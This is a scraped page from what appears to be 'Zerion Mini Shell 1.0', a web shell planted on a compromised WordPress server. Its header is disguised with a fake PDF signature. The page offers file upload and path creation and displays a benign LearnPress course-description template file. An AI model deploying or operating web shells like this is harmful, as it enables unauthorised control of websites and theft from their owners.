%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/ceaa/wp-content/themes/eduma/learnpress-v2/single-course/tabs/
Upload File :
Create Path :
Current File : /var/www/html/ceaa/wp-content/themes/eduma/learnpress-v2/single-course/tabs/overview.php

<?php
/**
 * Displaying the description of single course
 *
 * @author  ThimPress
 * @package LearnPress/Templates
 * @version 1.0
 */

if ( !defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

$course = LP()->course;

?>

<div class="course-description" id="learn-press-course-description">

	<?php do_action( 'learn_press_begin_single_course_description' ); ?>
	<?php
	if ( is_callable( array( $course, 'get_description' ) ) ) {
		echo $course->get_description();
	} else {
		echo 'You may need to update LearnPress plugin to the latest version.';
	}
	?>
	<?php do_action( 'learn_press_end_single_course_description' ); ?>

</div>

Zerion Mini Shell 1.0